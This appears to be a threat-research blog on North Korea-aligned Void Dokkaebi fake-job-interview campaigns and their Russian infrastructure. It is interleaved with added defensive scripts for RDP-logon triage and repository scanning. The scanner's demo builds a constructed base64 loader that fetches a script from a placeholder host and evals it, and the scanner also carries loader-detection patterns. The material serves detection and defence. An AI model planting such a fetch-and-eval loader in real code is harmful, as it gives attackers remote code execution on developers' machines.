Russian Infrastructure Plays Crucial Role in North Korean Cybercrime Operations

- Trend Research has identified multiple IP address ranges in Russia that are being used for cybercrime activities aligned with North Korea. These activities are associated with a cluster of campaigns related to the Void Dokkaebi intrusion set, also known as Famous Chollima.
- The Russian IP address ranges, which are concealed by a large anonymization network that uses commercial VPN services, proxy servers, and numerous VPS servers with RDP, are assigned to two companies in Khasan and Khabarovsk. Khasan is a mile from the North Korea-Russia border, and Khabarovsk is known for its economic and cultural ties with North Korea.
- Trend Research assesses that North Korea deployed IT workers who connect back to their home country through two IP addresses in the Russian IP ranges and two IP addresses in North Korea. Trend Micro’s telemetry strongly suggests these DPRK-aligned IT workers work from China, Russia and Pakistan, among others.
- Based on Trend Research’s assessment, North Korea-aligned actors use the Russian IP ranges to connect to dozens of VPS servers over RDP, then perform tasks like interacting on job recruitment sites and accessing cryptocurrency-related services. Some servers involved in their brute-force activity to crack cryptocurrency wallet passwords fall within one of the Russian IP ranges.
- Instructional videos have also been found with what looks like non-native English text, detailing how to set up a Beavertail malware command-and-control server and how to crack cryptocurrency wallet passwords. This makes it plausible that North Korea is also working with foreign conspirators.
- IT professionals in Ukraine, the US, and Germany have been targeted in these campaigns by fictitious companies that lure them into fraudulent job interviews. Trend Research assesses that the primary focus of Void Dokkaebi is to steal cryptocurrency from software professionals interested in cryptocurrency, Web3, and blockchain technologies.
- Trend Vision One™ detects and blocks the IOCs discussed in this blog. Trend Vision One customers can also access hunting queries, threat insights, and threat intelligence reports to gain rich context and the latest updates on Void Dokkaebi.
Internet access is scarce in North Korea; their national network only has 1,024 IP addresses assigned to it, yet the country’s role in cybercrime is significant. Multiple high-profile campaigns were publicly attributed to North Korean actors by international law enforcement, one of the latest being the US$1.5 billion Bybit hack. Naturally, to scale cybercrime to the levels attributed to North Korea, a lot more internet resources are needed than the 1,024 IP addresses. One way to achieve this is to send or hire significant numbers of IT workers abroad and let them work from there. Additionally, large-scale anonymization networks are being used to conceal campaigns linked to North Korea; these anonymization layers hide the origin of malicious traffic and make attribution harder.
In this blog entry, we will discuss how some of the campaigns linked to North Korea originate from five Russian IP ranges. These IP ranges are hidden from plain sight by a VPN layer, a proxy layer, or an RDP layer. They have been assigned to two organizations in Khasan and Khabarovsk, Russia. We assess that campaigns linked to North Korea also make use of the internet infrastructure in other countries.
Khasan is a small town in Russia that is only one mile away from the border with North Korea and China. It is home to a railway bridge called the Korea-Russia Friendship bridge. Khabarovsk is known for its economic and cultural ties with North Korea. Therefore, these two towns are a natural fit for the home of cybercrime operations that are aligned with the objectives of North Korea. We found that the Russian IP ranges connect to numerous VPS servers around the world using RDP and then do tasks from there, like communicating through apps like Skype, Telegram, Discord and Slack, contacting foreign IT professionals on job recruitment sites and connecting to cryptocurrency-related websites, for example, to empty stolen cryptocurrency wallets or launder money.
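The pattern described above, one source range opening RDP sessions to many VPS hosts, is something a defender can check for in their own logon telemetry. The following is an added example, not Trend Research's code: it reads flattened Windows Security events (one per line, as a SIEM export might look), keeps only successful interactive RDP logons (EventID 4624, LogonType 10), matches the source address against a watchlist of CIDR ranges, and reports any single source that fans out to several hosts. The watchlist CIDRs and the log lines are constructed placeholders from the RFC 5737 documentation ranges, not the Russian ranges from the report, and the line format is an assumption.

```python
"""Triage of inbound RDP logons against a watchlist of source ranges.

Added example (not Trend Research's code). The watchlist and the log
lines are constructed placeholders; load real ranges from your own
threat intelligence feed.
"""
import ipaddress
import re
from collections import defaultdict

# Assumed flattened event format, one event per line.
EVENT_RX = re.compile(
    r"(?P<ts>\S+) host=(?P<host>\S+) EventID=(?P<eid>\d+) LogonType=(?P<ltype>\d+) "
    r"SourceIP=(?P<src>\S+) TargetUser=(?P<user>\S+)"
)

# Placeholder watchlist (RFC 5737 documentation ranges), standing in for
# the ranges an analyst would load from threat intelligence.
WATCHLIST = [ipaddress.ip_network(c) for c in ("203.0.113.0/24", "198.51.100.0/24")]

# Constructed sample log: one watchlisted source hopping across three VPS
# hosts over RDP, plus a non-RDP logon, an unrelated source, a failed
# logon (4625) and a malformed line.
SAMPLE_LOG = """\
2025-03-01T10:02:11Z host=vps-01 EventID=4624 LogonType=10 SourceIP=203.0.113.45 TargetUser=admin
2025-03-01T10:05:40Z host=vps-02 EventID=4624 LogonType=10 SourceIP=203.0.113.45 TargetUser=admin
2025-03-01T10:07:02Z host=vps-03 EventID=4624 LogonType=10 SourceIP=203.0.113.45 TargetUser=deploy
2025-03-01T11:15:09Z host=vps-01 EventID=4624 LogonType=3 SourceIP=203.0.113.45 TargetUser=svc
2025-03-01T11:30:00Z host=vps-04 EventID=4624 LogonType=10 SourceIP=192.0.2.10 TargetUser=admin
2025-03-01T11:31:00Z host=vps-04 EventID=4625 LogonType=10 SourceIP=198.51.100.7 TargetUser=admin
this line is not an event
"""


def parse_event(line):
    """Parse one flattened event; return a dict or None if the line is malformed."""
    m = EVENT_RX.match(line.strip())
    if not m:
        return None
    try:
        src = ipaddress.ip_address(m["src"])
    except ValueError:
        return None
    return {"ts": m["ts"], "host": m["host"], "eid": int(m["eid"]),
            "ltype": int(m["ltype"]), "src": src, "user": m["user"]}


def in_watchlist(ip, watchlist=WATCHLIST):
    """True if the address falls inside any watchlisted network."""
    return any(ip in net for net in watchlist)


def analyze(log_text, watchlist=WATCHLIST, fan_out_threshold=3):
    """Return watchlist hits and sources that reach >= threshold distinct hosts."""
    watch_hits = []
    hosts_by_src = defaultdict(set)
    for line in log_text.splitlines():
        ev = parse_event(line)
        # Keep only successful interactive RDP logons (4624, logon type 10).
        if ev is None or ev["eid"] != 4624 or ev["ltype"] != 10:
            continue
        if in_watchlist(ev["src"], watchlist):
            watch_hits.append((ev["host"], str(ev["src"]), ev["user"]))
        hosts_by_src[str(ev["src"])].add(ev["host"])
    fan_out = {ip: sorted(hosts) for ip, hosts in hosts_by_src.items()
               if len(hosts) >= fan_out_threshold}
    return {"watchlist_hits": watch_hits, "fan_out": fan_out}


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for host, src, user in result["watchlist_hits"]:
        print(f"watchlist RDP logon: {src} -> {host} as {user}")
    for src, hosts in result["fan_out"].items():
        print(f"fan-out: {src} reached {len(hosts)} hosts: {', '.join(hosts)}")
```

The fan-out check is deliberately independent of the watchlist: a source that opens RDP sessions to many of your hosts in a short window is worth a look even when its range is not yet on any list, and the watchlist check in turn catches a single logon from a known range before any fan-out appears.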
Foreign IT professionals are contacted as part of a common social engineering tactic that involves enticing software developers with fake job interviews. In this scheme, developers apply for positions advertised on platforms like LinkedIn and other recruitment sites. The supposed recruiter requests the applicant to complete specific tasks as part of the interview process. These tasks may involve debugging or enhancing code that the applicant must download from reputable code repositories such as GitHub, GitLab, Bitbucket, or private GitLab sites. While these repositories often do not host malicious code directly, they may contain code that injects obfuscated, harmful scripts hosted on third-party websites. When the applicant runs the downloaded code on their personal computer or a production system, rather than in an isolated virtual environment, the attacker gains access to the applicant’s system.
Once inside, the attacker might install other malware that will automatically look for sensitive data like passwords and cryptocurrency wallets. They may then proceed to try to empty the cryptocurrency wallets and steal other sensitive data too. Some compromised devices get integrated into the attacker’s anonymizing infrastructure by installing legitimate proxy software like CCProxy.
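The delivery step described above, an interview "assignment" repository that looks harmless but contains a small loader which fetches and evaluates obfuscated code from a third-party host, is exactly what an applicant or an appsec reviewer should look for before running anything outside an isolated VM. The following is an added example, not Trend Research's code: a static triage script that walks a checkout, flags source files matching loader-style patterns (dynamic evaluation, process spawning, remote fetches, base64 decoding, long encoded blobs), decodes embedded base64 blobs and scans the decoded text too, and scores the combination of a remote fetch plus dynamic evaluation highest. The sample repository it builds in a temporary directory, including the hostname `cdn.example.invalid`, is constructed for the demonstration.

```python
"""Static triage of a take-home assignment repository before running it.

Added example (not Trend Research's code). The patterns are generic
loader indicators; the sample files written by demo_scan() are
constructed, and the host they reference is a placeholder.
"""
import base64
import os
import re
import tempfile

# Indicators a reviewer wants to see before executing unknown code.
PATTERNS = {
    "dynamic_eval": re.compile(r"\b(eval|Function)\s*\(|\bexec\s*\("),
    "child_process": re.compile(r"child_process|subprocess|os\.system"),
    "remote_fetch": re.compile(r"\b(fetch|axios|request|urllib|https?\.get)\b", re.I),
    "base64_decode": re.compile(r"atob\s*\(|Buffer\.from\([^)]*['\"]base64|b64decode"),
    "external_url": re.compile(r"https?://[^\s'\"`]+"),
    "long_blob": re.compile(r"['\"][A-Za-z0-9+/=]{120,}['\"]"),
}
BLOB_RX = re.compile(r"['\"]([A-Za-z0-9+/=]{120,})['\"]")
SOURCE_EXT = {".js", ".ts", ".mjs", ".cjs", ".py", ".json"}
SKIP_DIRS = {".git", "node_modules"}


def scan_text(text):
    """Return the set of indicator names matched in one file's contents."""
    hits = {name for name, rx in PATTERNS.items() if rx.search(text)}
    # Loaders often hide the fetch-and-eval stage inside a base64 string:
    # decode each long blob once and scan the decoded text as well.
    for blob in BLOB_RX.findall(text):
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except (ValueError, UnicodeDecodeError):
            continue
        hits |= {f"decoded:{n}" for n, rx in PATTERNS.items() if rx.search(decoded)}
    return hits


def risk_score(hits):
    """Crude severity: remote fetch combined with dynamic eval is the loader signature."""
    names = {h.split(":")[-1] for h in hits}
    score = len(hits)
    if {"remote_fetch", "dynamic_eval"} <= names:
        score += 5
    return score


def scan_repo(root):
    """Walk a checkout; return {relative_path: (score, sorted hits)} for flagged files."""
    findings = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in SKIP_DIRS]
        for fn in filenames:
            if os.path.splitext(fn)[1] not in SOURCE_EXT:
                continue
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_text(fh.read())
            if hits:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                findings[rel] = (risk_score(hits), sorted(hits))
    return findings


def demo_scan():
    """Build a constructed sample repo in a temp dir and scan it."""
    # Constructed second stage: fetch a script from a placeholder host and eval it.
    stage2 = ('const https=require("https");'
              'https.get("https://cdn.example.invalid/v1/loader.js",r=>{'
              'let d="";r.on("data",c=>d+=c);r.on("end",()=>eval(d))});')
    blob = base64.b64encode(stage2.encode()).decode()
    files = {
        "package.json": '{"name":"assignment","scripts":{"start":"node src/app.js"}}\n',
        "src/app.js": ("const express = require('express');\nconst app = express();\n"
                       "app.get('/', (req, res) => res.send('ok'));\napp.listen(3000);\n"),
        # Constructed loader hidden in a config file: decode blob, run it.
        "config/settings.js": (f"const p = Buffer.from('{blob}', 'base64').toString();\n"
                               "new Function(p)();\n"),
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, content in files.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(content)
        return scan_repo(root)


if __name__ == "__main__":
    for rel, (score, hits) in sorted(demo_scan().items(), key=lambda kv: -kv[1][0]):
        print(f"{score:3d}  {rel}: {', '.join(hits)}")
```

A clean hit list on `src/app.js` and a high score on `config/settings.js` is the expected shape: the application code is the part the applicant is asked to look at, while the loader sits in a file nobody is asked to read. The script is a triage aid, not a verdict; anything it flags still belongs in a disposable VM with no wallet, password store or production credentials on it.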
In another scheme, North Korean IT workers secure IT-related jobs at Western companies and utilize laptop farms operated by co-conspirators residing in the West. By using these laptop farms, North Korean IT workers can conceal the fact that they are working remotely for a foreign country from their victim companies. Trend Research assesses that this scheme is closely related to Beavertail malware campaigns.
This blog entry also explores clusters of Beavertail malware campaigns attributed to Void Dokkaebi (also known as Famous Chollima). We focused on a fictitious company called BlockNovas, which has a website and a presence on several job recruitment platforms, including LinkedIn and Upwork. Hundreds of applicants have responded to BlockNovas’ job postings, with several of them getting infected with malware during the interview process. BlockNovas posted job openings targeting Web3 and blockchain experts in Ukraine, the US, Germany, and other countries. BlockNovas has utilized Beavertail and Invisible Ferret malware, as well as employed tactics where applicants are enticed to download and execute malware to solve a fictitious problem with their laptop camera during an automated job interviewing process.
While investigating BlockNovas, we discovered that lower levels of the anonymization layers are IP ranges in Russia, which we mentioned earlier in this introduction. Another cluster of Beavertail command-and-control (C&C) servers has been administered through VPN, proxies and RDP sessions from the same Russian IP ranges as well.
This leads us to an intriguing hypothesis: Key North Korean offensive cyber activities are conducted from or through internet infrastructure located in the Russian towns of Khasan and Khabarovsk; such infrastructure has been set up since 2017 and increased in size since 2023.
BlockNovas
One of the fictitious companies used to lure victims into these fraudulent interviews is BlockNovas[.]com, which presents itself with a modern designed website and claims to be active in blockchain technologies (Figure 1). It maintains a presence on social media platforms such as Facebook, X (formerly known as Twitter), LinkedIn, and various job recruitment websites. This online presence is designed to enhance its credibility and attract unsuspecting software developers into applying for non-existent positions.
BlockNovas is likely using artificial intelligence (AI) to help them create online personas and conduct the interview process. A lot of legitimate job interviews in the technology space are held online, and this may have resulted in more job applicants letting their guard down. We observed BlockNovas for some time on LinkedIn and other recruitment sites, and found that fictitious new BlockNovas employees at key positions – like a chief technology officer (CTO) – popped up from seemingly nowhere. However, these profiles often had some history on the social media network and usually hundreds of followers. Occasionally, compromised accounts were also used to amplify new job postings. With what seems like a credible online presence at first sight, BlockNovas has probably reached hundreds of job applicants.